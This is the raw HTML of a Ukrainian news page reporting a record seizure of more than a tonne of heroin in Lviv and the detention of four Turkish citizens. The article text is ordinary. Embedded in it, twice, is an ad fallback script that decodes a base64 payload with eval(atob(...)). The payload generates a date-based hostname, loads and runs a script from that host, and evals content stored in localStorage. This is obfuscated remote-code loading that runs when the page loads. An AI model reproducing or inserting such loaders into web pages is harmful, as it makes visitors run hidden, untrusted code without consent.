


<!DOCTYPE html>
<html lang="uk-ua" dir="ltr" prefix="og: http://ogp.me/ns# fb: http://www.facebook.com/2008/fbml og: http://opengraphprotocol.org/schema/">
<head>

<link rel="preload" href="https://nikopol.nikopolnews.net/media/jui/fonts/IcoMoon.woff" as="font" type="font/woff" crossorigin>
<meta name="theme-color" content="#e4e4e4">
<link rel="alternate" href='android-app://news.nikopolnews.net' />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#353b4b">

<script async src="https://code.jquery.com/jquery-latest.min.js"></script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/1.5.10/clipboard.min.js"></script>
<script>
jQuery(document).ready(function($){
var url = document.location.href;
new Clipboard('.copy_link', {text: function(){ return url;}});
$('.copy_k').click(function(){alert('Посилання успішно скопійовано');});
});
</script>

<script async custom-element="amp-ad" src="https://cdn.ampproject.org/v0/amp-ad-0.1.js"></script>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<meta charset="utf-8" />
	<base href="https://nikopolnews.net/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto" />
	<meta name="keywords" content="під, щоб, час, львові, україни, рекордну, партію, героїну, україну, затримано" />
	<meta name="rights" content="Источник: https://nikopolnews.net" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:title" content="Більше тонни: у Львові вилучили рекордну партію героїну (фото)" />
	<meta name="twitter:site" content="@newsnikopol" />
	<meta name="twitter:creator" content="@newsnikopol" />
	<meta name="twitter:image:src" content="https://nikopolnews.net/images/2020/4241212222525425212121.jpg" />
	<meta name="author" content="Маруся Оффон" />
	<meta property="og:locale" content="uk_UA" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Більше тонни: у Львові вилучили рекордну партію героїну (фото)" />
	<meta property="og:url" content="https://nikopolnews.net/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto" />
	<meta property="og:site_name" content="Національна служба новин - Новини України" />
	<meta property="og:image" content="https://nikopolnews.net/images/2020/4241212222525425212121.jpg" />
	<meta property="og:image:width" content="758" />
	<meta property="og:image:height" content="505" />
	<meta property="og:headline" content="Більше тонни: у Львові вилучили рекордну партію героїну (фото)" />
	<meta property="og:updated_time" content="2021-01-05T17:16:44+02:00" />
	<meta property="article:modified_time" content="2021-01-05T17:16:44+02:00" />
	<meta property="article:published_time" content="2021-01-05T17:16:44+02:00" />
	<meta property="article:section" content="Події" />
	<meta property="news_keywords" content="під, щоб, час, львові, україни, рекордну, партію, героїну, україну, затримано" />
	<meta property="article:tag" content="під" />
	<meta property="article:tag" content="щоб" />
	<meta property="article:tag" content="час" />
	<meta property="article:tag" content="львові" />
	<meta property="article:tag" content="україни" />
	<meta property="article:tag" content="рекордну" />
	<meta property="article:tag" content="партію" />
	<meta property="article:tag" content="героїну" />
	<meta property="article:tag" content="україну" />
	<meta property="article:tag" content="затримано" />
	<meta property="article:publisher" content="https://www.facebook.com/nikopolnews" />
	<meta property="fb:app_id" content="542462062588270" />
	<meta name="description" content="За процесуального керівництва Львівської обласної прокуратури, під час спецоперації в рамках кримінального провадження за фактом контрабанди на" />
	<title>Більше тонни: у Львові вилучили рекордну партію героїну (фото) | Національна служба новин - Новини України</title>
	<link href="https://nikopolnews.net/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto/amp" rel="amphtml" />
	<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
	<link href="https://www.google.com" rel="dns-prefetch preconnect" />
	<link href="https://www.google-analytics.com" rel="dns-prefetch preconnect" />
	<link href="https://www.googletagmanager.com" rel="dns-prefetch preconnect" />
	<link href="https://fonts.googleapis.com" rel="dns-prefetch preconnect" />
	<link href="https://pagead2.googlesyndication.com" rel="dns-prefetch preconnect" />
	<link href="https://googleads.g.doubleclick.net" rel="dns-prefetch preconnect" />
	<link href="https://tpc.googlesyndication.com" rel="dns-prefetch preconnect" />
	<link href="https://adservice.google.com" rel="dns-prefetch preconnect" />
	<link href="https://partner.googleadservices.com" rel="dns-prefetch preconnect" />
	<link href="https://www.youtube.com" rel="dns-prefetch preconnect" />
	<link href="https://i.ytimg.com" rel="dns-prefetch preconnect" />
	<link href="https://s.ytimg.com" rel="dns-prefetch preconnect" />
	<link href="https://yt3.ggpht.com" rel="dns-prefetch preconnect" />
	<link href="https://fonts.gstatic.com" rel="dns-prefetch preconnect" />
	<link href="https://userapi.com" rel="dns-prefetch preconnect" />
	<link href="https://vk.com" rel="dns-prefetch preconnect" />
	<link href="https://nikopolnews.net/index.php/components/jursspublisher/yatableau" rel="yandex-tableau-widget" />
	<link href="/templates/protostar/css/template.css?743f8b0e683187f576e8e9ed3eaff449" rel="stylesheet" />
	<link href="https://nikopolnews.net/templates/protostar/html/mod_junewsultra/default/css/style.css" rel="stylesheet" />
	<link href="/modules/mod_jw_srfr/tmpl/default/css/template.css" rel="stylesheet" />
	<!--[if lt IE 9]><script src="/media/jui/js/html5-uncompressed.js?743f8b0e683187f576e8e9ed3eaff449"></script><![endif]-->
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/region\/25-proisshestviya\/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto"}</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","name":"\u0411\u0456\u043b\u044c\u0448\u0435 \u0442\u043e\u043d\u043d\u0438: \u0443 \u041b\u044c\u0432\u043e\u0432\u0456 \u0432\u0438\u043b\u0443\u0447\u0438\u043b\u0438 \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 (\u0444\u043e\u0442\u043e)","articleBody":"\r\n\r\n\u0417\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u0435\u0440\u0456\u0432\u043d\u0438\u0446\u0442\u0432\u0430 \u041b\u044c\u0432\u0456\u0432\u0441\u044c\u043a\u043e\u0457 \u043e\u0431\u043b\u0430\u0441\u043d\u043e\u0457 \u043f\u0440\u043e\u043a\u0443\u0440\u0430\u0442\u0443\u0440\u0438, \u043f\u0456\u0434 \u0447\u0430\u0441 \u0441\u043f\u0435\u0446\u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0457 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u0440\u0438\u043c\u0456\u043d\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0432\u0430\u0434\u0436\u0435\u043d\u043d\u044f \u0437\u0430 \u0444\u0430\u043a\u0442\u043e\u043c \u043a\u043e\u043d\u0442\u0440\u0430\u0431\u0430\u043d\u0434\u0438 \u043d\u0430\u0440\u043a\u043e\u0442\u0438\u0447\u043d\u0438\u0445 \u0437\u0430\u0441\u043e\u0431\u0456\u0432 \u0432\u0438\u043b\u0443\u0447\u0435\u043d\u043e \u0440\u0435\u043a\u043e\u0440\u0434\u043d\u0443 \u043f\u0430\u0440\u0442\u0456\u044e \u0433\u0435\u0440\u043e\u0457\u043d\u0443 \u0432\u0430\u0433\u043e\u044e \u043f\u043e\u043d\u0430\u0434 1 \u0442\u043e\u043d\u043d\u0443, \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u043f\u0440\u0435\u0441\u0446\u0435\u043d\u0442\u0440 \u041e\u0444\u0456\u0441\u0443 \u0433\u0435\u043d\u043f\u0440\u043e\u043a\u0443\u0440\u043e\u0440\u0430, ","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/region\/25-proisshestviya\/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/4241212222525425212121.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/4241212222525425212121.jpg","height":505,"width":758},"dateCreated":"2021-01-05T17:15:01+02:00","dateModified":"2021-01-05T17:16:44+02:00","datePublished":"2021-01-05T17:16:44+02:00","interactionCount":"154","author":{"@type":"Person","name":"\u041c\u0430\u0440\u0443\u0441\u044f \u041e\u0444\u0444\u043e\u043d"},"publisher":{"@type":"Organization","name":"\u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d - \u041d\u043e\u0432\u0438\u043d\u0438 \u0423\u043a\u0440\u0430\u0457\u043d\u0438","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebSite","name":"\u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d - \u041d\u043e\u0432\u0438\u043d\u0438 \u0423\u043a\u0440\u0430\u0457\u043d\u0438","url":"https:\/\/nikopolnews.net\/","potentialAction":{"@type":"SearchAction","target":"https:\/\/nikopolnews.net\/component\/search\/{search_term_string}","query-input":"required name=search_term_string"}}</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","url":"https:\/\/nikopolnews.net\/","logo":"https:\/\/nikopolnews.net\/images\/jamp\/6789.jpg"}</script>
	<script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"Organization","name":"\u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d - \u041d\u043e\u0432\u0438\u043d\u0438 \u0423\u043a\u0440\u0430\u0457\u043d\u0438","url":"https:\/\/nikopolnews.net\/","sameAs":[["https:\/\/www.facebook.com\/groups\/nikopolnews\/","https:\/\/vk.com\/nikopolnews","https:\/\/twitter.com\/newsnikopol","https:\/\/ok.ru\/nikopolnews","https:\/\/www.youtube.com\/channel\/UCCn7a3nLMjM_jwuuzacJfOQ?view_as=subscriber","https:\/\/nikopolnews.net","https:\/\/t.me\/nikopolnews","https:\/\/play.google.com\/store\/apps\/details?id=news.nikopolnews.net"]]}</script>

<meta itemprop="telephone" content="+38 (095) 325-96-00">
<meta itemprop="address" content="Нікополь, Дніпропетровска область">

</head>
<body class="site com_content view-article no-layout no-task itemid-123">

 <style type="text/css">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</style>

	<!-- Body -->
	<div class="body" id="top">
	<nav class="navigation" role="navigation">


  <input type="checkbox" id="nav-toggle" hidden>

  <nav class="nav">

    <label for="nav-toggle" class="nav-toggle" onclick><div class="men">меню</div></label>
<div class="fb">
<a href="https://www.facebook.com/pg/nacnews/posts/?ref=page_internal" target="_blank">
<i class="fa fa-facebook-square"></i>
</a>
</div>
<div class="rss">
<a href="https://www.youtube.com/channel/UCCn7a3nLMjM_jwuuzacJfOQ?sub_confirmation=1" target="_blank">
<i class="fa fa-youtube-square"></i>
</a>
</div>						<div class="header-search pull-right">											<form action="/nikopol" method="post" class="form-inline" role="search">
							<label for="mod-search-searchword87" class="element-invisible">Шукати...</label> 
							<input name="searchword" id="mod-search-searchword87" maxlength="200" class="inputbox search-query input-medium" type="search" size="20" placeholder="Пошук..."> <input type="hidden" name="task" value="search"> <input type="hidden" name="option" value="com_search"> <input type="hidden" name="Itemid" value="122">
							</form>
						</div>			    <ul>
      <li><a href="/region">Регіони</a>
      <li><a href="/ukraina">Україна</a>
      <li><a href="/mir">Світ</a>
      <li><a href="/politika">Політика</a>
      <li><a href="/obshchestvo">Суспільство</a> 
			<li><a href="/zhkkh">ЖКГ</a>
			<li><a href="/ekonomika">Економіка</a> 
      <li><a href="/proisshestviya">Події</a>
      <li><a href="/dosug">Дозвілля</a>
      <li><a href="/priroda">Природа</a>
      <li><a href="/doska-ob-yavlenij">Корисна інформація</a> 
			<li><a href="/zhiznennoe">Життєве</a>			<li><a href="/covid-19">covid-19</a>
    </ul>
  </nav>
 <!-- Main body -->
					<div class="brandsmail">
						<a href="/"><img src="/templates/protostar/images/shapkasmail.png" width="auto" /></a>							</div>
					<div class="tele">
					<a href="https://t.me/nns_news" target="_blank"><img class="ampmetaimage smartresize" src="/templates/protostar/images/tele.png" width="auto" /></a>
				  </div>
		</nav>
										<header class="header" role="banner">
			<div id="logo-small">
<script type="text/javascript">
window.onload = function(){
  document.getElementById('close').onclick = function(){
    this.parentNode.parentNode.parentNode
    .removeChild(this.parentNode.parentNode);
    return false;
  };
};	</script>

</div>
		</header>					<div class="container">

<div class="shapkaright2">
<!-- Горизонтальній в шапку NNS -->
<div id="Zbc9Pv5NiLgpnN83dr5t" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'kiopwerdsd.mobi';</script>
<script src="//kiopwerdsd.mobi/3c9.js" ></script>
</div>
			<div class="row-fluid">
										<main id="content" role="main" class="span9">


					<!-- Begin Content -->
					<div id="forajax">
				<div class="shapkaright3" style="max-height: 234px !important;">
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Горизонтальній в шапку NNS -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="8434922785"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>
<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="8434922785"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>
</div>											<div class="shapkaright2">
	</div>


<article class="item item-page" itemscope="" itemtype="http://schema.org/Article">





<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>



	<h1>
	 <div class="titletexst">
			<a href="/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto">
		Більше тонни: у Львові вилучили рекордну партію героїну (фото)</a>
		</div>
	</h1>


	<dl class="article-info">
	<dd class="create">
	<span class="icon-calendar" aria-hidden="true"></span>
		<SPAN>05 січ. 2021</SPAN>	</dd>

	<dd class="hits">
	<span class="icon-eye-open" aria-hidden="true"></span>
	Перегляди: 154	</dd>
		<ul class="tags inline">
																	<li class="tag-6 tag-list0" itemprop="keywords">
					<a href="/component/tags/tag/proishestviya" class="label label-info">
						Події					</a>
				</li>
						</ul>
	</dl>





<div class="shapkaright2">

</div>


<div class="social" data-url="https://nikopolnews.net/region/25-proisshestviya/19759-saira-bilshe-tonny-u-lvovi-vyluchyly-rekordnu-partiiu-heroinu-foto">			<a class="push facebook" data-id="fb"><i class="fa fa-facebook"></i></a>
		<a class="push vkontakte" data-id="vk"><i class="fa fa-vk"></i></a>
		<a class="push telegram" data-id="tl"><i class="fa fa-telegram"></i></a>
     <a class="push ok" data-id="ok"><i class="fa fa-odnoklassniki"></i></a>			<a class="push twitter" data-id="tw"><i class="fa fa-twitter"></i></a>
		<a class="push viber" data-id="viber"><i class="fa fa-phone"></i></a>
</div>
<div class="konteyner">


<p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/4241212222525425212121.jpg" /></p><div align="center">

<div class="addsensebr">

</div>
<div class="gupl">
<p style="text-align: center; font-size: 0.9em; margin-bottom: 4px;"><a href="https://play.google.com/store/apps/details?id=news.nikopolnews.net" target="_blank" rel="noopener noreferrer">Завантажте</a> мобільний додаток сайту</p><div align="center">
<div class="meta">

</div>
</div>
</div>
</div>

<p>За процесуального керівництва Львівської обласної прокуратури, під час спецоперації в рамках кримінального провадження за фактом контрабанди наркотичних засобів вилучено рекордну партію героїну вагою понад 1 тонну, <a href="https://www.gp.gov.ua/ua/news?_m=publications&amp;_c=view&amp;_t=rec&amp;id=286519">повідомляє</a> пресцентр Офісу генпрокурора, передає&nbsp;<a href="https://nikopolnews.net/sitemap" target="_blank">NNS</a>.</p><div align="center">
<div class="addsensebr">
<div id="MIXADV_6622" class="MIXADVERT_NET"></div>
     <script> 
     var node6622 = document.getElementById("MIXADV_6622");
     if( node6622 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6622&r="+Math.random();
        node6622.parentNode.appendChild(script); 
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MjIgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYyMi5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY2MjIucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MjIuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MjIiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script>
</div>
</div>

 
<blockquote>
<p>«За даними слідства, наркотичний засіб контрабандою був ввезений в Україну з Пакистану у грудні минулого року через Морський торговельний порт «Південний» (м. Одеса). Далі «товар» під виглядом харчової продукції транспортували на Західну Україну щоб переправити до країн Європейського Союзу як дипломатичний вантаж»,</p><div align="center">

<div class="addsensebr">

<script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- В статью квадратный адаптивный -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>

<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>

</div>
</div>
</blockquote>

<p><cite>— йдеться в повідомленні.</cite></p>

<p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/4424221421212121.jpg" /></p>

<p>Повідомляється, що під час обшуку складів у м. Львові, де зберігався наркотик, в порядку ст. 208 КПК України затримано чотирьох громадян Туреччини.</p><div align="center">

<div class="addsensebr">

<script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- В статью квадратный адаптивный -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>

<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>

</div>
</div>

<p>Орієнтована вартість вилученого наркотичного засобу за цінами «чорного ринку» становить 2, 3 млрд гривень.</p>

<p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/142212122222222.jpg" /></p>

<p>Наразі проводяться першочергові слідчі дії та вживаються заходи для встановлення інших співучасників злочину. Досудове розслідування триває.</p><div align="center">

<div class="addsensebr">

<script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- В статью квадратный адаптивный -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>

<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>

</div>
</div>

<p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/12222663225555563.jpg" /></p>

<p><img alt="" class="ampmetaimage smartresize" src="https://nikopolnews.net/images/2020/212222455555222.jpg" /></p>

<h2><span style="color: #2c6fa0;font-size: 1.1300rem!important;line-height: 25px;border-left: 7px solid silver;padding-left: 5px;font-weight: 500;">Щоб оперативно отримувати найважливіші новини України і світу, підписуйтесь на наш</span><a href="https://t.me/nikopolnews" target="_blank"><span style="color:#ff0000;"> Телеграм</span></a></h2>

<p></p><div align="center">

<div class="addsensebr">

<script defer src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- В статью квадратный адаптивный -->
<ins class="adsbygoogle"
   style="display:block"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-ad-format="auto"
   data-full-width-responsive="true"></ins>
<script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script>

<amp-ad width="100vw" height="320"
   type="adsense"
   data-ad-client="ca-pub-4305834550386423"
   data-ad-slot="9583942834"
   data-auto-format="rspv"
   data-full-width="">
 <div overflow=""></div>
</amp-ad>

</div>
</div>


</div>

<div id="logo-fb">
<div id="share">
<span class="copy_link copy_k">Копіювати посилання на матеріал</span>
</div>
<div class="gn">
<a class="" href="https://news.google.com/publications/CAAqBwgKMOrfjAswnoOdAw?hl=uk&amp;gl=UA&amp;ceid=UA%3Auk" rel="nofollow" target="_blank">
<noscript class="jsll-noscript"><img style="float:left; padding-left: 15px; padding-top: 3px;" src="/templates/protostar/images/gn/gn.webp" alt="" width="70px" height="55px"></noscript><img style="float:left; padding-left: 15px; padding-top: 3px;" src="/templates/protostar/images/gn/gn.webp" alt="" width="70px" height="55px">
<div style="padding: 5px;padding-left: 0;font-size: 15px;color: white;">Підписатися у Google News</div>
</a></div>
</div>

<!-- в самом низу -->
<div id="MIXADV_6615" class="MIXADVERT_NET"></div>
     <script> 
     var node6615 = document.getElementById("MIXADV_6615");
     if( node6615 )
     {
        var script = document.createElement("script");
        script.charset = "utf-8";
        script.src = "https://m.mixadvert.com/show/?id=6615&r="+Math.random();
        node6615.parentNode.appendChild(script); 
        script.onerror = function(){
         window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY2MTUgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjYxNS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY2MTUucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY2MTUuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY2MTUiKSkgfSwgNTAwMCk7ICA7fTsg") );
       }
     }
     </script>

<div class="autor">
	<dd class="createdby">
							Автор: <a href="/component/contact/contact/4-uncategorised/5-marusia-offon?Itemid=101" >Маруся Оффон</a>			</dd>
</div>



<div class="addsensebrslon">

</div>

<div class="shapkaright2">

</div>

<h2 class="logo-title">Національна служба новин - Новини України</h2>

<div class="content-item">
</div>




</article>


<ul class="pager pagenav">
	<li class="next">
		<a class="pagination__next hasTooltip" title="Поклав мертвого у багажник і намагався втекти: на Одещині водій збив велосипедиста (фото)" aria-label="наступна стаття: Поклав мертвого у багажник і намагався втекти: на Одещині водій збив велосипедиста (фото)" href="/region/25-proisshestviya/19726-saira-poklav-mertvoho-u-bahazhnyk-i-namahavsia-vtekty-na-odeshchyni-vodii-zbyv-velosypedysta-foto" rel="next">
			<span aria-hidden="true">Наступна</span> <span class="icon-chevron-right" aria-hidden="true"></span>		</a>
	</li>
</ul>

					</div>									<div id="system-message-container">
	</div>
											
					<div class="clearfix">
							<div class="moduletable hit">
							<h3 class=" contet-title">Зараз популярне</h3>
						<ul class="mostread hit mod-list">
	<li itemscope itemtype="https://schema.org/Article">
		<a href="/ukraina/44-ekonomika/13636-aktsii-v-supermarketakh-atb-s-23-po-29-dekabrya" itemprop="url">
			<span itemprop="name">
